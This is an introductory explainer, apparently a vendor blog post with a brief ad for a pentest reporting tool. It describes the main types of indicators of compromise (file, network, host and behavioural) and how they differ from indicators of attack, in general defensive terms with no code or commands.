IOCs are data artifacts left behind after or during a cyberattack. These indicators provide signs—sometimes obvious, often subtle—that malicious activity has occurred. Think of them as fingerprints at a crime scene. They help cybersecurity professionals detect breaches, trace the attacker’s actions, and understand the nature and scope of an incident. Unlike predictive defenses such as firewalls or anti-virus signatures, IOCs are reactive but essential—they confirm that an attack has happened or is in progress.
Types of IOCs
IOCs come in many forms and serve different purposes based on the layer of the attack they reveal. File-based IOCs include data like hash values of malware (such as MD5 or SHA-256), filenames, or file locations typically used by attackers. These indicators help identify whether known malware is present on a system.
Network-based IOCs focus on communication patterns and include elements such as suspicious IP addresses, command-and-control domains, and traffic over unusual ports. These can indicate external communication with attacker infrastructure.
Host-based IOCs relate to changes made within the system environment, such as unauthorized registry edits, strange process behavior, or the appearance of services not normally running. These are often the most immediate signs of intrusion on an endpoint.
Finally, behavioral IOCs capture anomalies in user or system behavior. Examples include employees accessing confidential data they normally don’t use, login attempts from geographically improbable locations, or system access during off-hours. These patterns can help detect threats even when attackers use previously unseen malware or tools.
Want to save time on reporting?
Let PentestPad generate, track, and export your reports - automatically.
IOCs vs. IOAs
It’s important to distinguish IOCs from Indicators of Attack (IOAs). While IOCs represent the signs that an attack has occurred—such as a known malware file or C2 IP—IOAs reveal the attacker’s intent and tactics. IOAs focus on behavior rather than artifacts. For instance, a user launching PowerShell to download an unknown script could be flagged as an IOA, even if that script is new and has no associated hash yet. Both IOCs and IOAs are crucial, but IOAs are particularly effective at identifying novel or zero-day attacks that haven’t been seen before.